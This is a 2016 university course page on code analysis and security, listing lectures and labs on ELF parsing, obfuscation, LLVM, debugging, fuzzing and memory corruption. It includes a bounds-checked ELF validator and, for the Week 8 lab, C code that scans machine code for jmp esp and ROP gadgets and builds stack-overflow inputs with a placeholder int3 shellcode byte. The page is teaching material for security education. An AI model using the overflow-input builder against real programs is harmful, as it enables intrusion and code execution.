Code: analysis, bugs, and security
optional course, supported by Bitdefender
Instructor: Marius Minea, marius@cs.upt.ro (Office: B531. Phone: +40-256-403284)
Lab assistant: Andrei Ardelean, gmail: andreirardelean
Course: Wed 8-10, ASPC
Lab: Thu 16-18, B528; Fri 12-14, B418
New: contest with special prizes for students participating in the course
Course materials
- Introduction.
Sample program: print addresses
- Assembly language.
Sample programs: nested expression (and in three-address code), switch, array of function pointers, lists with pointers to pointers
See also: x86 Assembly Guide (David Evans, U. Virginia)
- Robust and secure programming in C
See also: CERT C Coding Standard
- Compiler basics. Native code and bytecode.
- Linking and loading.
A very good summary (D. Beazley et al.)
U. Drepper. How to write shared libraries -- a very detailed description.
- Obfuscation (summary). Extensive slideset (Christian Collberg, U. Arizona)
Extra: a recent deobfuscation paper (IEEE S&P 2015) -- see general discussion and obfuscated graphs.
- Analysis with LLVM. Intro and LLVM Passes (F. Pereira, UFMG); also the tutorial from the 2015 LLVM Developers' Meeting
Obfuscate add pass + CMakeFile (adapted from tutorial above).
Writing an LLVM pass and LLVM Programmer's Manual
Laboratory
- Week 2: structure of a Unix executable (ELF)
For the lab: practice writing programs which follow file structure, e.g. ZIP file, bitmap, etc.
Lab summary (parseElf.c): inspect the file-processing code and its error checks, and try to find a missing check with very bad consequences.
- Week 3: write an unzip program and check it against some test archives (some of which have problems)
Archive with all zip files; the file zipinfo.txt describes each zip.
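Added example (not the lab's parseElf.c and not code from the course): a bounds-checked walk over the section header table of an ELF64 image, using the structures from <elf.h> on Linux. The names elf_check, build_image and patch_u64 are my own, and the image is constructed in memory rather than read from a real binary. Every offset and size taken from the file is tested as off <= len && size <= len - off before it is used; the same discipline applies to the offsets and sizes in ZIP local and central headers that the Week 3 unzip program reads.

```c
#include <elf.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Result of elf_check(): ELF_OK or the first violated check. */
enum { ELF_OK = 0, ELF_TRUNCATED, ELF_BAD_IDENT, ELF_BAD_SHENTSIZE,
       ELF_SHTAB_OOB, ELF_SHSTRNDX_OOB, ELF_SECTION_OOB };

/* Is [off, off + size) inside a buffer of len bytes?  Never computes off + size,
 * so a huge offset or size taken from the file cannot wrap around and pass. */
static int in_bounds(uint64_t off, uint64_t size, size_t len) {
    return off <= len && size <= len - off;
}

/* Validate the section header table of a little-endian ELF64 image in memory.
 * Returns ELF_OK or the first violation; on success *nsec receives e_shnum. */
int elf_check(const uint8_t *buf, size_t len, size_t *nsec) {
    Elf64_Ehdr eh;
    if (len < sizeof eh) return ELF_TRUNCATED;
    memcpy(&eh, buf, sizeof eh);                      /* buf may be unaligned */
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_ident[EI_CLASS] != ELFCLASS64 || eh.e_ident[EI_DATA] != ELFDATA2LSB)
        return ELF_BAD_IDENT;
    if (eh.e_shnum == 0) { if (nsec) *nsec = 0; return ELF_OK; }   /* no section table */
    if (eh.e_shentsize != sizeof(Elf64_Shdr)) return ELF_BAD_SHENTSIZE;
    /* The whole table must lie inside the file (e_shnum is 16-bit: no overflow). */
    if (!in_bounds(eh.e_shoff, (uint64_t)eh.e_shnum * sizeof(Elf64_Shdr), len))
        return ELF_SHTAB_OOB;
    /* The section-name string table index must name an existing section. */
    if (eh.e_shstrndx != SHN_UNDEF && eh.e_shstrndx >= eh.e_shnum)
        return ELF_SHSTRNDX_OOB;
    for (size_t i = 0; i < eh.e_shnum; i++) {
        Elf64_Shdr sh;
        memcpy(&sh, buf + eh.e_shoff + i * sizeof sh, sizeof sh);
        if (sh.sh_type == SHT_NOBITS) continue;       /* .bss occupies no file bytes */
        if (!in_bounds(sh.sh_offset, sh.sh_size, len)) return ELF_SECTION_OOB;
    }
    if (nsec) *nsec = eh.e_shnum;
    return ELF_OK;
}

/* Overwrite an 8-byte little-endian field at byte offset off, the way a malformed file would. */
void patch_u64(uint8_t *img, size_t off, uint64_t v) {
    for (int i = 0; i < 8; i++) img[off + i] = (uint8_t)(v >> (8 * i));
}

/* Build a constructed, minimal ELF64 image: header, NULL section, a 3-byte .text and
 * .shstrtab (not loadable; just enough structure for elf_check()).  Returns its length. */
size_t build_image(uint8_t *out, size_t cap) {
    static const char strtab[] = "\0.text\0.shstrtab";  /* names at offsets 1 and 7 */
    static const uint8_t text[] = { 0x31, 0xc0, 0xc3 };  /* xor eax,eax ; ret */
    enum { TEXT_OFF = 64, STR_OFF = TEXT_OFF + sizeof text, SH_OFF = 88, NSEC = 3 };
    size_t total = SH_OFF + NSEC * sizeof(Elf64_Shdr);
    if (cap < total) return 0;
    memset(out, 0, total);
    Elf64_Ehdr eh;
    memset(&eh, 0, sizeof eh);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS64;  eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_ident[EI_VERSION] = EV_CURRENT;
    eh.e_type = ET_EXEC;  eh.e_machine = EM_X86_64;  eh.e_version = EV_CURRENT;
    eh.e_ehsize = sizeof eh;  eh.e_shentsize = sizeof(Elf64_Shdr);
    eh.e_shoff = SH_OFF;  eh.e_shnum = NSEC;  eh.e_shstrndx = 2;
    memcpy(out, &eh, sizeof eh);
    memcpy(out + TEXT_OFF, text, sizeof text);
    memcpy(out + STR_OFF, strtab, sizeof strtab);
    Elf64_Shdr sh[NSEC];
    memset(sh, 0, sizeof sh);                          /* sh[0]: mandatory NULL section */
    sh[1].sh_name = 1;  sh[1].sh_type = SHT_PROGBITS;  sh[1].sh_flags = SHF_ALLOC | SHF_EXECINSTR;
    sh[1].sh_offset = TEXT_OFF;  sh[1].sh_size = sizeof text;  sh[1].sh_addralign = 1;
    sh[2].sh_name = 7;  sh[2].sh_type = SHT_STRTAB;
    sh[2].sh_offset = STR_OFF;  sh[2].sh_size = sizeof strtab;  sh[2].sh_addralign = 1;
    memcpy(out + SH_OFF, sh, sizeof sh);
    return total;
}

int main(void) {
    static const char *names[] = { "ok", "truncated", "bad ident", "bad e_shentsize",
        "section table outside file", "e_shstrndx out of range", "section outside file" };
    uint8_t img[512];
    size_t n = build_image(img, sizeof img), nsec = 0;
    printf("valid image: %s, %zu sections\n", names[elf_check(img, n, &nsec)], nsec);
    /* Malformed 1: e_shoff points past the end of the file. */
    patch_u64(img, offsetof(Elf64_Ehdr, e_shoff), 0x100000);
    printf("bad e_shoff: %s\n", names[elf_check(img, n, NULL)]);
    /* Malformed 2: .text's sh_offset + sh_size wraps to a small value; a parser that
     * tests only off + size <= len would accept it and read far outside the buffer. */
    build_image(img, sizeof img);
    patch_u64(img, 88 + 64 + offsetof(Elf64_Shdr, sh_offset), 0xfffffffffffffff0ull);
    patch_u64(img, 88 + 64 + offsetof(Elf64_Shdr, sh_size), 0x20);
    printf("wrapped .text: %s\n", names[elf_check(img, n, NULL)]);
    return 0;
}
```

Reading headers with memcpy into a local struct (instead of casting buf + e_shoff to an Elf64_Shdr *) also avoids the misaligned-access undefined behaviour that a file offset under attacker control can trigger.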
- Week 4: Examine and modify assembly produced by the compiler.
- Week 5: Running in a debugger. GDB command summary
The programs with function hooking and mprotect written in the lab (also updated for 64 bits; try it yourself first).
Some more explanations about how library functions are resolved with different compilers.
- Week 6. Obfuscation. First and second binary to work on.
The Tigress virtualizer/obfuscator
- Week 7. Writing an LLVM pass: obfuscate add, count memory writes.
- Week 8. Memory corruption vulnerabilities. Test program.
- overwrite the return address with that of go_shell
- insert your own payload on the stack
- same as above, but with a randomized stack (search for a jmp esp instruction)
- with non-executable stack enabled, do a ROP attack
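Added example for the last two items (not the lab's test program or its go_shell, which are not reproduced here): a gadget scanner that looks for jmp esp and pop reg; ret at every byte offset of a code region, the way the "search for jmp esp" step and a ROP gadget search are done, plus a builder for the overflow input (filler up to the saved return address, the target address little-endian, then shellcode or further chain entries). The code bytes in sample_code, the 0x08048000 base and the 76-byte distance to the saved return address are constructed assumptions; in the lab you take the real values from objdump and gdb.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* One hit: byte offset inside the scanned region and a short description. */
typedef struct { size_t off; const char *what; } gadget_t;

/* Scan x86 machine code for "jmp esp" (ff e4) and "pop r32 ; ret" (58..5f c3).
 * x86 is not self-synchronising, so every byte offset is tried: a gadget may sit
 * inside the immediate of a longer instruction the compiler never meant to emit.
 * Returns the number of hits stored in out (at most cap). */
size_t find_gadgets(const uint8_t *code, size_t len, gadget_t *out, size_t cap) {
    static const char *pop_ret[8] = { "pop eax; ret", "pop ecx; ret", "pop edx; ret",
        "pop ebx; ret", "pop esp; ret", "pop ebp; ret", "pop esi; ret", "pop edi; ret" };
    size_t n = 0;
    for (size_t i = 0; i + 1 < len && n < cap; i++) {
        if (code[i] == 0xff && code[i + 1] == 0xe4)
            out[n++] = (gadget_t){ i, "jmp esp" };
        else if (code[i] >= 0x58 && code[i] <= 0x5f && code[i + 1] == 0xc3)
            out[n++] = (gadget_t){ i, pop_ret[code[i] - 0x58] };
    }
    return n;
}

/* Build the overflow input: dist filler bytes up to the saved return address, then
 * target as a little-endian address of addr_size bytes (4 for the 32-bit lab program,
 * 8 on 64-bit), then an optional tail (shellcode after a jmp esp, or the next ROP
 * chain entries).  Returns the total length, or 0 if the arguments do not fit. */
size_t build_payload(size_t dist, uint64_t target, int addr_size,
                     const uint8_t *tail, size_t tail_len, uint8_t *out, size_t cap) {
    if (addr_size != 4 && addr_size != 8) return 0;
    if (addr_size == 4 && target > 0xffffffffu) return 0;  /* does not fit a 32-bit slot */
    size_t total = dist + (size_t)addr_size + tail_len;
    if (total > cap) return 0;
    memset(out, 'A', dist);
    for (int i = 0; i < addr_size; i++)
        out[dist + i] = (uint8_t)(target >> (8 * i));
    if (tail_len) memcpy(out + dist + addr_size, tail, tail_len);
    return total;
}

/* Constructed code bytes (not taken from any real binary).  The mov immediate
 * 0x0000e4ff puts the bytes ff e4 at offset 4: an unintended jmp esp gadget. */
static const uint8_t sample_code[] = {
    0x55,                          /* push ebp                      */
    0x89, 0xe5,                    /* mov  ebp, esp                 */
    0xb8, 0xff, 0xe4, 0x00, 0x00,  /* mov  eax, 0x0000e4ff          */
    0x5b,                          /* pop  ebx   <- pop ebx; ret at offset 8 */
    0xc3,                          /* ret                           */
    0x90,                          /* nop                           */
};

int main(void) {
    gadget_t hits[8];
    size_t n = find_gadgets(sample_code, sizeof sample_code, hits, 8);
    for (size_t i = 0; i < n; i++)
        printf("gadget at offset %zu: %s\n", hits[i].off, hits[i].what);
    /* Hypothetical layout: code mapped at 0x08048000, saved return address 76 bytes
     * past the start of the overflowed buffer.  int3 stands in for real shellcode. */
    uint8_t payload[128], shellcode[] = { 0xcc };
    uint64_t jmp_esp = 0x08048000u + (n ? hits[0].off : 0);
    size_t len = build_payload(76, jmp_esp, 4, shellcode, sizeof shellcode,
                               payload, sizeof payload);
    printf("payload: %zu bytes, return address 0x%08llx, then %zu byte(s) of shellcode\n",
           len, (unsigned long long)jmp_esp, sizeof shellcode);
    return 0;
}
```

With a non-executable stack the tail is no longer shellcode but the next entries of the ROP chain (the values popped by pop reg; ret gadgets and the addresses of the gadgets that follow), so build_payload is called with the chain as its tail and the first gadget's address as target.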
- Week 9. Writing a clang checker. Tutorial; archive and code written in the lab.
- Week 11. Fuzzing and symbolic execution.
American Fuzzy Lop
Tool to interpret KLEE results
Resources
Other courses
Marius Minea
Last modified: Thu Nov 10 14:15:00 EET 2016